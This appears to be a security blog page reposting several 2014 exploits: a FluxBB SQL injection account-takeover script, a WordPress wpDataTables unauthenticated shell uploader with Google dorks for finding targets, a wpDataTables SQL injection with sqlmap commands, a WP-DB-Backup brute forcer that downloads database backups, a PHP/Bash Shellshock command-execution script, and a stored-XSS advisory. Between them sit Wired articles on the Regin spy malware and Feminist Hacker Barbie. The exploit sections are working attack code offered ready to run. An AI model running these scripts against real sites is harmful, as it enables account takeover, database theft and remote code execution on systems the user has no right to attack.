MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

26Nov/140

FluxBB 1.5.6 SQL Injection

#!/usr/bin/env python
# Friday, November 21, 2014 - secthrowaway@safe-mail.net
# FluxBB <= 1.5.6 SQL Injection
# make sure that your IP is reachable
 
url  = 'http://target.tld/forum/'
user = 'user' # dummy account
pwd  = 'test' 
 
import urllib, sys, smtpd, asyncore, re, sha
from email import message_from_string
from urllib2 import Request, urlopen
 
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
bindip = '0.0.0.0'
 
def stage1(sql):
  if len(sql) > 80:
    sys.exit('SQL too long, max 80 chars')
  print "1st stage: %s (%d chars)" % (sql, len(sql))
  r = urlopen(Request('%sprofile.php?action=change_email&id=%s' % (url, uid), data="form_sent=1&req_new_email=%s&req_password=%s&new_email=Submit" % (urllib.quote(sql), pwd), headers={"Referer": "%sprofile.php" % url, "User-agent": ua, "Cookie": cookie})).read()
  if 'An email has been sent to the specified address' not in r:
    sys.exit('err')
 
def stage3(key):
  print "3rd stage, using key: %s" % key
  r = urlopen(Request('%sprofile.php?action=change_pass&id=%s&key=%s' % (url, uid, key), headers={"User-agent": ua})).read()
  if 'Your password has been updated' in r:
    print 'success'
  else:
    print 'err'
 
class stage2_smtp(smtpd.SMTPServer):
  def process_message(self, peer, mailfrom, rcpttos, data):
    print '2nd stage: got mail', peer, mailfrom, "to:", rcpttos
    key = re.search("(https?://.*&key=([^\s]+))", message_from_string(data).get_payload(decode=True), re.MULTILINE)
    if key is not None: 
      raise asyncore.ExitNow(key.group(2))
    return
 
def login():
  print "logging in"
  r = urlopen(Request('%slogin.php?action=in' % url, data="form_sent=1&req_username=%s&req_password=%s" % (user, pwd), headers={"User-agent": ua}))
  try:
    t = r.info()['set-cookie'].split(';')[0]
    return (t.split('=')[1].split('%7C')[0], t)
  except:
    sys.exit('unable to login, check user/pass')
 
uid, cookie = login()
 
email_domain = urlopen(Request('http://tns.re/gen')).read()
print "using domain: %s" % email_domain
 
#this will change your password to your password :)
stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new(pwd).hexdigest(), uid, email_domain))
 
#this will change admin's (uid=2) password "123456"
#stage1('%s\'/**/where/**/id=%s#@%s' % (sha.new("123456").hexdigest(), 2, email_domain))
 
try:
  print "2nd stage: waiting for mail"
  server = stage2_smtp((bindip, 25), None)
  asyncore.loop()
except asyncore.ExitNow, key:
  stage3(key)

(8)

26Nov/140

WordPress wpDataTables 1.5.3 Shell Upload

#!/usr/bin/python
#
# Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability
# 
# Vulnerability discovered by Claudio Viviani
#
# Date : 2014-11-22
#
# Exploit written by Claudio Viviani
#
# Video Demo: https://www.youtube.com/watch?v=44m4VNpeEVc
#
# --------------------------------------------------------------------
#
# Issue n.1 (wpdatatables.php)
#
# This function is always available without wpdatatables edit permission:
#
#    function wdt_upload_file(){
#        require_once(PDT_ROOT_PATH.'lib/upload/UploadHandler.php');
#        $uploadHandler = new UploadHandler();
#        exit();
#    }
#    ...
#    ...
#    ...
#    add_action( 'wp_ajax_wdt_upload_file', 'wdt_upload_file' );
#    add_action( 'wp_ajax_nopriv_wdt_upload_file', 'wdt_upload_file' );
# 
#
# Issue n.2 (lib/upload/UploadHandler.php)
#
# This php script allows you to upload any type of file
#
# ---------------------------------------------------------------------
#
# Dork google:  inurl:/plugins/wpdatatables
#               inurl:codecanyon-3958969
#               index of "wpdatatables"
#               index of "codecanyon-3958969"
#
# Tested on BackBox 3.x
#
#
# http connection
import urllib, urllib2, sys, re
# Args management
import optparse
# file management
import os, os.path
 
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url
 
# Check if file exists and has readable
def checkfile(file):
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file
 
# Create multipart header
def create_body_sh3ll_upl04d(payloadname):
 
   getfields = dict()
 
   payloadcontent = open(payloadname).read()
 
   LIMIT = '----------lImIt_of_THE_fIle_eW_$'
   CRLF = '\r\n'
 
   L = []
   for (key, value) in getfields.items():
      L.append('--' + LIMIT)
      L.append('Content-Disposition: form-data; name="%s"' % key)
      L.append('')
      L.append(value)
 
   L.append('--' + LIMIT)
   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname))
   L.append('Content-Type: application/force-download')
   L.append('')
   L.append(payloadcontent)
   L.append('--' + LIMIT + '--')
   L.append('')
   body = CRLF.join(L)
   return body
 
banner = """
   ___ ___               __                                                         
  |   Y   .-----.----.--|  .-----.----.-----.-----.-----.                           
  |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|                           
  |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|                           
  |:      |                |__|                                                     
  |::.|:. |                                                                         
  `--- ---'                                                                         
         ___ ___       ______         __         _______       __    __                
        |   Y   .-----|   _  \ .---.-|  |_.---.-|       .---.-|  |--|  .-----.-----.   
        |.  |   |  _  |.  |   \|  _  |   _|  _  |.|   | |  _  |  _  |  |  -__|__ --|   
        |. / \  |   __|.  |    |___._|____|___._`-|.  |-|___._|_____|__|_____|_____|   
        |:      |__|  |:  1    /                  |:  |                                
        |::.|:. |     |::.. . /                   |::.|                                
        `--- ---'     `------'                    `---'                                
 
                                                        Sh311 Upl04d Vuln3r4b1l1ty 
                                                                <= 1.5.3
 
                                   Written by:
 
                                 Claudio Viviani
 
                              http://www.homelab.it
 
                                 info@homelab.it
                             homelabit@protonmail.ch
 
                        https://www.facebook.com/homelabit
                          https://twitter.com/homelabit
                          https://plus.google.com/+HomelabIt1/
               https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
 
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file name, ex: shell.php",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )
 
options, remainder = commandList.parse_args()
 
# Check args
if not options.target or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 
payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
 
print(banner)
 
url_wpdatatab_upload = host+'/wp-admin/admin-ajax.php?action=wdt_upload_file'
 
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
 
bodyupload = create_body_sh3ll_upl04d(payloadname)
 
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'content-type': content_type,
           'content-length': str(len(bodyupload)) }
 
try:
   req = urllib2.Request(url_wpdatatab_upload, bodyupload, headers)
   response = urllib2.urlopen(req)
 
   read = response.read()
 
   if "error" in read or read == "0":
      print("[X] Upload Failed :(")
   else:
      backdoor_location = re.compile('\"url\":\"(.*?)\",\"').search(read).group(1)
      print("[!] Shell Uploaded")
      print("[!] Location: "+backdoor_location.replace("\\",""))
except urllib2.HTTPError as e:
   print("[X] Http Error: "+str(e))
except urllib2.URLError as e:
   print("[X] Connection Error: "+str(e))

(7)

26Nov/140

WordPress wpDataTables 1.5.3 SQL Injection

######################
# Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability
# Exploit Author : Claudio Viviani 
# Software Link : http://wpdatatables.com (Premium)
# Date : 2014-11-22
# Tested on : Windows 7 / Mozilla Firefox
              Windows 7 / sqlmap (0.8-1)
              Linux / Mozilla Firefox
              Linux / sqlmap 1.0-dev-5b2ded0
######################
 
# Description
 
Wordpress wpDataTables 1.5.3 and below suffers from SQL injection vulnerability
 
"table_id" variable is not sanitized.
 
File: wpdatatables.php
------------------------
    // AJAX-handlers
    add_action( 'wp_ajax_get_wdtable', 'wdt_get_ajax_data' );
    add_action( 'wp_ajax_nopriv_get_wdtable', 'wdt_get_ajax_data' );
 
  /**
   * Handler which returns the AJAX response
   */
   function wdt_get_ajax_data(){
     $id = $_GET['table_id']; <------------------- Not Sanitized!
       $table_data = wdt_get_table_by_id( $id );
       $column_data = wdt_get_columns_by_table_id( $id );
       $column_headers = array();
       $column_types = array();
       $column_filtertypes = array();
       $column_inputtypes = array();
       foreach($column_data as $column){
           $column_order[(int)$column->pos] = $column->orig_header;
           if($column->display_header){
             $column_headers[$column->orig_header] = $column->display_header;
           }
           if($column->column_type != 'autodetect'){
             $column_types[$column->orig_header] = $column->column_type;
           }else{
             $column_types[$column->orig_header] = 'string';
           }  
           $column_filtertypes[$column->orig_header] = $column->filter_type;
           $column_inputtypes[$column->orig_header] = $column->input_type;
       }
------------------------
 
(The vulnerable variable is located in others php files)
 
######################
 
# PoC
 
http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1 [Sqli]
 
# Sqlmap
 
sqlmap -u "http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1" -p table_id --dbms mysql
 
---
Parameter: table_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=get_wdtable&table_id=1 AND 9029=9029
 
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=get_wdtable&table_id=1 AND SLEEP(5)
 
---
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################

(7)

26Nov/140

WordPress WP-DB-Backup 2.2.4 Backup Theft

#!/bin/bash
#Larry W. Cashdollar, @_larry0
#Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on
#20141031 assumes the wordpress database is wordpress and the table prefix is wp_
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite
 
DATE="20141031"; #Date to search
 
if [ ! -e rainbow ]; then
 
cat << -EOF- > rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path 
Larry W. Cashdollar*/
#include <stdio.h>
int
main (void)
{
  char string[16] = "0123456789abcdef";
  int x, y, z, a, b;
  for (x = 0; x < 16; x++)
      for (y = 0; y < 16; y++)
    for (z = 0; z < 16; z++)
        for (a = 0; a < 16; a++)
      for (b = 0; b < 16; b++)
          printf ("%c%c%c%c%c\n", string[x], string[y], string[z],
            string[a], string[b]);
return(0);
}
-EOF-
echo "[+] Compiling rbow.c"
gcc rbow.c -o rbow
echo "[+] Creating rainbow table..."
./rbow > rainbow
fi
 
if [ ! -e found.txt ]; then
Z=0
K=`wc -l rainbow|awk '{print $1}'`;
echo "[+] Searching....";
  for x in `cat rainbow`; do 
                CPATH="http://$1/wp-content/backup-$x/";
     RESULT=`curl -s --head $CPATH|grep 200`;
                if [ -n "$RESULT" ]; then
                 echo "[+] Location $CPATH Found";
                 echo "[+] Received $RESULT";
                 echo $x > found.txt;
                 break; #break here
  fi;
                 echo -n "Percent Done: ";
                 Y=`echo "scale=6;($Z/$K)*100"|bc`;
                 echo -n $Y
                 echo "%";
                 Z=$(( $Z + 1 ));
done
else
x=`cat found.txt`;
fi
 
# Now that we have the directory lets try to locate the database backup file.
 
K=999;
for y in `seq -w 0 999`; do 
                CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql"; #change WP Database Name and Table Prefix here
     RESULT=`curl -s --head $CPATH|grep 200`;
                if [ -n "$RESULT" ]; then
                 echo "[+] Database backup $CPATH Found";
                 echo "[+] Received $RESULT";
                 wget $CPATH
                 exit; #break here
  fi;
                 echo -n "Percent Done: ";
                 Y=`echo "scale=2;($Z/$K)*100"|bc`;
                 echo -n $Y
                 echo "%";
                 Z=$(( $Z + 1 ));
done

(7)

26Nov/140

PHP 5.x / Bash Shellshock Proof Of Concept

<?php
 
// Exploit Title: PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit
// Date: 22/11/2014
// Exploit Author: ssbostan
// Vendor Homepage: http://www.gnu.org/software/bash/
// Software Link: http://ftp.gnu.org/gnu/bash/
// Version: <= 4.3
// Tested on: Fedora 17, Ubuntu 8.04
// CVE: http://www.cvedetails.com/cve/CVE-2014-6271/
 
if(isset($_GET["cmd"]) && !empty($_GET["cmd"]))
{
  $file=tempnam("/tmp", "xpl");
  putenv("PHP_XPL=() { :;}; {$_GET["cmd"]}>{$file}");
  mail("xpl@localhost", "", "", "", "-bv");
  echo file_get_contents($file);
  unlink($file);
}
 
?>

(6)

24Nov/140

Researchers Uncover Government Spy Tool Used to Hack Telecoms and Belgian Cryptographer

Researchers Uncover Government Spy Tool Used to Hack Telecoms and Belgian Cryptographer

It was the spring of 2011 when the European Commission discovered it had been hacked. The intrusion into the EU’s legislative body was sophisticated and widespread and used a zero-day exploit to get in. Once the attackers established a stronghold on the network, they were in for the long haul. They scouted the network architecture for additional victims and covered their tracks well. Eventually, they infected numerous systems belonging to the European Commission and the European Council before being discovered.

Two years later another big target was hacked. This time it was Belgacom, the partly state-owned Belgian telecom. In this case, too, the attack was sophisticated and complex. According to published news reports and documents leaked by Edward Snowden, the attackers targeted system administrators working for Belgacom and used their credentials to gain access to routers controlling the telecom’s cellular network. Belgacom publicly acknowledged the hack, but has never provided details about the breach.

Then five months after that announcement, news of another high-profile breach emerged—this one another sophisticated hack targeting prominent Belgian cryptographer Jean-Jacques Quisquater.

Now it appears that security researchers have found the massive digital spy tool used in all three attacks. Dubbed “Regin” by Microsoft, more than a hundred victims have been found to date, but there are likely many others still unknown. That’s because the espionage tool—a malicious platform capable of taking over entire networks and infrastructures—has been around since at least 2008, possibly even earlier, and is built to remain stealth on a system for years.

The threat has been known since at least 2011, around the time the EU was hacked and some of the attack files made their way to Microsoft, who added detection for the component to its security software. Researchers with Kaspersky Lab only began tracking the threat in 2012, collecting bits and pieces of the massive threat. Symantec began investigating it in 2013 after some of its customers were infected. Putting together information from each, it’s clear the platform is highly complex and modulated and can be customized with a wide range of capabilities depending on the target and the attackers’ needs. Researchers have found 50 payloads so far for stealing files and other data, but have evidence that still more exist.

“It’s a threat that everyone has detected for some time, but no one has exposed [until now],” says Eric Chien, technical director of Symantec’s Security Technology and Response division.

The Most Sophisticated Spy Tool Yet

The researchers have no doubt that Regin is a nation-state tool and are calling it the most sophisticated espionage machine uncovered to date—more complex even than the massive Flame platform, uncovered by Kaspersky and Symantec in 2012 and crafted by the same team who created Stuxnet.

“In the world of malware threats, only a few rare examples can truly be considered groundbreaking and almost peerless,” writes Symantec in its report about Regin.

Though no one is willing to speculate on the record about Regin’s source, news reports about the Belgacom and Quisquater hacks pointed a finger at GCHQ and the NSA. Kaspersky confirms that Quisqater was infected with Regin, and other researchers familiar with the Belgacom attack have told WIRED that the description of Regin fits the malware that targeted the telecom, though the malicious files used in that attack were given a different name, based on something investigators found inside the platform’s main file.

Victims are located in multiple countries. Kaspersky has found them in Algeria, Afghanistan, Belgium, Brazil, Fiji, Germany, Iran, India, Malaysia, Syria, Pakistan, Russia and the small Pacific island nation of Kiribati. The majority of victims Symantec has tracked are located in Russia and Saudi Arabia.

Targets include entire networks, not just individuals, among them telecoms in multiple countries, as well as government agencies, research institutes and academics (particularly those doing advanced mathematics and cryptography, like Quisquater). Symantec has also found hotels infected. These are likely targeted for their reservation systems, which can provide valuable intelligence about visiting guests.

But perhaps the most significant aspect of Regin is its ability to target GSM base stations of cellular networks. The malicious arsenal includes a payload that Kaspersky says was used in 2008 to steal the usernames and passwords of system administrators of a telecom somewhere in the Middle East. Armed with these credentials, the attackers would have been able to access GSM base station controllers—the part of a cellular network that controls transceiver stations—to manipulate the systems or even install malicious code to monitor cellular traffic. They could also conceivably have shut down the cellular network—for example, during an invasion of the country or other unrest.

Kaspersky won’t identify the telecom or country where this GSM attack hack occurred, but suggests it’s either Afghanistan, Iran, Syria or Pakistan, as out of Kaspersky’s list of countries with Regin infections, only these four are in the region popularly considered the Middle East. Afghanistan stands out among the four, having been the only one cited in recent news stories about government hacking of GSM networks. Although most authorities would place it in South Asia, it is often popularly identified as being part of the Middle East.

Earlier this year, news reports based on documents leaked by Edward Snowden revealed two NSA operations codenamed MYSTIC and SOMALGET that involved hijacking the mobile network of several countries to collect metadata on every mobile call to and from these nations and, in at least two countries, to covertly record and store the full audio of calls. The countries where metadata was collected were identified as Mexico, Kenya, the Philippines and the island nation of the Bahamas. Countries where full audio was being recorded were identified as the Bahamas and Afghanistan.
The Path to Discovery

The Regin platform made its first public appearance in 2009 when someone uploaded components of the tool to the VirusTotal web site. VirusTotal is a free web site that aggregates dozens of anti-virus scanners. Researchers, and anyone else who finds a suspicious file on their system, can upload the file to the site to see if the scanners consider it malicious.

No one apparently noticed this upload in 2009, however. It wasn’t until March 9, 2011 that Microsoft appeared to take note, around the time that more files were uploaded to VirusTotal, and announced that the company had added detection for a trojan called Regin.A to its security software. The following day, it made the same announcement about a variant called Regin.B. Some in the security community believe the files uploaded to VirusTotal in 2011 might have come from the European Commission or from a security firm hired to investigate its breach.

Guido Vervaet, the EU Commission’s director of security who helped investigate the breach, wouldn’t discuss it other than to say it was “quite” extensive and very sophisticated, with a “complex architecture.” He says the attackers used a zero-day exploit to get in but wouldn’t say what vulnerability they attacked. The attack was uncovered by system administrators only when systems began malfunctioning. Asked if the attackers used the same malware that struck Belgacom, Vervaet couldn’t say for sure. “It was not one piece of software; it was an architecture [that] was not just one component but a series of elements working together. We have analyzed the architecture of the attack, which was quite sophisticated and similar to other cases that we know of in other organizations” but internally they were unable to come to any conclusion “that it was the same attack or the same wrongdoers.”

Vervaet wouldn’t say when the intrusion began or how long the invaders had been in the EU network, but documents released by Snowden last year discussed NSA operations that had targeted the EU Commission and Council. Those documents were dated 2010.

There are currently two known versions of the Regin platform in the wild. Version 1.0 dates back to at least 2008 but disappeared in 2011 the same year Microsoft released signatures to detect its trojan. Version 2.0 popped up in 2013, though it may have been used earlier than this. Researchers have found some Regin files with timestamps dating to 2003 and 2006, though it’s not clear if the timestamps are accurate.

Liam O’Murchu, senior manager in Symantec’s threat response group, says the threat landscape in 2008 was much different than it is today and this likely contributed to Regin remaining stealth for so long. “I don’t think we realized attackers were working on this level until we saw things like Stuxnet and Duqu and we realized they’d been on this level for quite some time.” Those discoveries prompted researchers to begin looking for threats in different ways.

It’s unclear how the first infections occur. Neither Symantec nor Kaspersky has uncovered a dropper component (a phishing email containing an exploit that drops the malware onto a machine or entices victims to click on a malicious link), but based on evidence in one attack from 2011, Symantec thinks the attackers might have used a zero-day vulnerability in Yahoo Instant Messenger. But Chien says the attackers probably used multiple techniques to get into different environments. Reports about the hack of Belgacom describe a more sophisticated man-in-the-middle technique that involved using a rogue server to hijack the browser of Belgacom system administrators and redirect them to web pages the attackers controlled that infected their machines with malware.

Regardless of how it first gets into a machine, the Regin attack unfolds in five stages. Stages one through three load the attack and configure its architecture, while stages four and five launch the payloads. Among the payload options are a remote access trojan that gives the attackers backdoor access to infected systems, a keystroke logger and clip board sniffer, a password sniffer, modules to collect information about USB devices connected to the infected system, and an email extraction module called U_STARBUCKS. Regin can also scan for deleted files and retrieve them.

The execution of components is orchestrated by an elaborate component that researchers have dubbed the “conductor.” This is “the brain of the whole platform,” says Costin Raiu, head of Kaspersky’s Global Research and Analysis Team.

Regin uses a nested decrypting technique, decrypting itself in stages, with the key for decrypting each component in the component that precedes it. This made it difficult for researchers to examine the threat in the beginning when they didn’t have all of the components and all of the keys.

Regin also uses an unusual technique in some cases to hide its data, by storing it in the Extended Attributes portion of Windows. Extended Attributes is a storage area for metadata associated with files and directories, such as when a file was created or last altered or whether an executable program was downloaded from the internet (and therefore needs a prompt warning users before opening). Extended Attributes limits the size of data blocks it can store, so Regin splits the data it wants to store into separate encrypted chunks to hide them. When it needs to use this data, the conductor links the chunks together so they can execute like a single file.

The attackers also use a complex communication structure to manage the large scope of network-wide infections. Instead of communicating directly with the attackers’ command servers, each system talks only to other machines on the network and with a single node that acts as a hub to communicate with command servers. This reduces the amount of traffic leaving the network and the number of machines communicating with a strange server outside the network, which can draw suspicion. It also allows the attackers to communicate with systems inside the organization that might not even be connected to the internet.
‘It’s Totally Crazy': The Middle-Eastern Hacks

The most elaborate and extensive infection Kaspersky saw that used this technique occurred in a Middle Eastern country the researchers decline to name. They call the infection “mind-blowing” and say in their report that it consisted of an elaborate web of networks the attackers infected and then linked together. These include networks for the office of the president of the country, a research center, an educational institute that from its name appears to be a mathematics institute, and a bank. In this case, instead of having each of the infected networks communicate with the attackers’s command server individually, the attackers set up an elaborate covert communication web between them so that commands and information passed between them as if through a peer-to-peer network. All of the infected networks then interfaced with one system at the educational institute, which served as a hub for communicating with the attackers.

“It’s totally crazy,” says Raiu.”The idea is to have one single control mechanism for the whole country so they can just run one command, and that command is replicated between all the members on the peer-to-peer network.”

The connections between infected machines and networks are encrypted, with each infected node using a public and private key to encrypt traffic exchanged between them.

Kaspersky refers to the educational institute as the “Magnet of Threats” because they found all sorts of other advanced threats infesting its network—including the well-known Mask malware and Turla—all co-existing peacefully with Regin.

But on par with this attack was one that occurred in another Middle East country against the GSM network of a large, unidentified telecom. The Kaspersky researchers say they found what appears to be an activity log the attackers used to collect commands and login credentials for one of the telecom’s GSM base station controllers. The log, about 70 KB in size, contains hundreds of commands sent to the base station controller between April 25 and May 27 of 2008. It’s unclear how many of the commands were sent by telecom administrators or by the attackers themselves in an attempt to control base stations.

The commands, which Kaspersky identified as Ericsson OSS MML commands, are used for checking the software version on a base station controller, retrieving a list of the call forwarding settings for the mobile station, enabling call forwarding, listing the transceiver route for a particular cell tower, activating and deactivating cell towers in the GSM network, and adding frequencies to the active list of frequencies used by the network. The log shows commands going to 136 different GSM cell sites—cell sites with names like prn021a, gzn010a, wdk004, and kbl027a. In addition to commands, the log also shows usernames and passwords for the telecom’s engineer accounts.

“They found a computer that manages a base station controller, and that base station controller is able to reach out to hundreds of cells,” says Raiu. He says there are two or three GSM operators in the targeted country and the one the attackers targeted is the largest. He doesn’t know if the others were infected as well.

Both of these infections—targeting the GSM network and the presidential network—appear to be ongoing. As news of the Regin attack spreads and more security firms add detection for it to their tools, the number of victims uncovered will no doubt grow.

http://www.wired.com/2014/11/mysteries-of-the-malware-regin/

(58)

23Nov/140

Feminist Hacker Barbie Is Just What Our Little Girls Need

Feminist Hacker Barbie Is Just What Our Little Girls Need

There’s an illustrated book called “Barbie: I Can be a Computer Engineer,” and everyone we know hated it.

Packed with “Over 50 Stickers!,” it dreams up a computer engineering version of Barbie who seems better at taking praise for other people’s work than doing any actual coding. It prompted some serious outrage on the net this week because Barbie the computer engineer says things like “I’m only creating the design ideas” and “I’ll need Steven’s and Brian’s help to turn it into a game.” She also infects her sister’s computer, leans on these two guy friends to fix the problem, and then takes credit for their work. Bad Barbie!

Says blogger Pamela Ribon: “It’s a perfect example of the way women and girls are perceived to ‘understand’ the tech world, and how frustrating it can be when nobody believes this is how we’re treated.”

But the internet has fallen in love with Feminist Hacker Barbie. She’s the brainchild of Kathleen Tuite, an independent computer programmer based near Santa Cruz, California, who spent a half-day this week putting together a website where people could re-caption the original book, hacking it to fix all of its pastel-hued problems.

Tuite, who until recently was a University of Washington graduate student studying crowdsourcing, says she created the site out of disappointment and frustration with the official Barbie book. In the past few days, her Feminist Hacker Barbie has blossomed into a full-blown and extremely funny internet meme with thousands of captions, many of which we think would make great fodder for a real Barbie engineering movie.

These captions work so well because of the sheer ridiculousness of the original Barbie images. In one of them, Barbie inexplicably sits in front of three computers, her hand on two different machines simultaneously. About 2,700 of the caption were uploaded to Tuite’s website—and then someone discovered a bug in the Django code Tuite used to build the site. In short order, Feminist Hacker Barbie got hacked.

At first, someone started uploading photos of Free Software Foundation advocate Richard Stallman. After that, came the porn. So Tuite pulled the plug on the uploads, but folks are free to create their own images and captions. And those have been popping up all over Twitter and Facebook for the past few days.

Tuite’s favorite so far is a picture from the book that includes a sample of the buggy code from her website—a sort of meta-cartoon, written as though Computer Engineer Barbie herself had unearthed the offending vulnerability.

Fonte: http://www.wired.com/2014/11/feminist-hacker-barbie-just-little-girls-need/
(81)

23Nov/140

Supr Shopsystem 5.1.0 Cross Site Scripting

Document Title:
===============
Supr Shopsystem v5.1.0 - Persistent UI Vulnerability
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1353
 
Release Date:
=============
2014-11-07
 
Vulnerability Laboratory ID (VL-ID):
====================================
1353
 
Common Vulnerability Scoring System:
====================================
3.1
 
Product & Service Introduction:
===============================
SUPR is a modern and user-friendly system which allows each store very quickly and easily create their own online store. 
Without installation and own webspace you can begin to create products and content right after the registration. With our 
free designs and the great customization options you can customize and adapt to your ideas your shop. You have to be an 
expert to work with the SUPR Shop.
 
( Copy of the Vendor Homepage: http://de.supr.com/tour )
 
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official Supr Shopsystem v5.1.0 web-application.
 
 
Vulnerability Disclosure Timeline:
==================================
2014-11-05:  Public Disclosure (Vulnerability Laboratory)
 
Discovery Status:
=================
Published
 
Affected Product(s):
====================
Supreme NewMedia GmbH
Product: Supr - Shopsystem Web Application 5.1.0
 
Exploitation Technique:
=======================
Remote
 
Severity Level:
===============
Medium
 
Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Supr Shopsystem v5.1.0 web-application.
The vulnerability can be exploited by remote attackers to execute persistent codes with forced client-side browser requests through a non expired session or by local post inject.
 
The vulnerability is located in the blogname, shop slogan and tags input fields of the Dashboard > Settings > General > (setting_shopdetail) module.
Remote attackers are able to prepare client-side requests with malicious context to take over administrator accounts on interaction (click link). 
Local attackers with privileged user accounts are also able to inject own script codes locally by manipulation of the vulnerable setting_shopdetail 
POST method request. The execution of the code occurs above to the error exception-handling that should prevent but got evaded.
 
The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
 
The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or connected module context.
 
Request Method(s):
          [+] POST
 
Vulnerable Module(s):
          [+] Dashboard > Settings > General > (setting_shopdetail)
 
Vulnerable Parameter(s):
          [+] blogname
          [+] blog/shop slogan
          [+] tags
 
Affected Module(s):
          [+] Dashboard (localhost:80/a/wp-admin/[x])
 
 
Proof of Concept (PoC):
=======================
The application-side vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction click.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
 
PoC: Dashboard > Settings > General > (setting_shopdetail)
 
<form id="setting_shopdetail" name="setting_shopdetail" method="post" action="">
                                <div class="form-row field-error">
                    <div class="label">
                        <label for="setting_shopdata_blogname" class="mandatory">Shopname</label>
                    </div>
                    <div class="field">
<input id="setting_shopdata_blogname" name="setting_shopdata[blogname]" value="" type="text"><[PERSISTENT INJECTED SCRIPT CODE!];)" <"="">
 
<ul class="">
    <li class="error">Das Feld <strong>Shopname</strong> enthält leider ungültige Zeichen!</li>
</ul></div>
 
Note: The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
 
 
--- PoC Session Logs [POST] ---
Status: 200[OK]
 POST https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[localhost:80]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
      Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3; 
__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1; 
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47; 
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
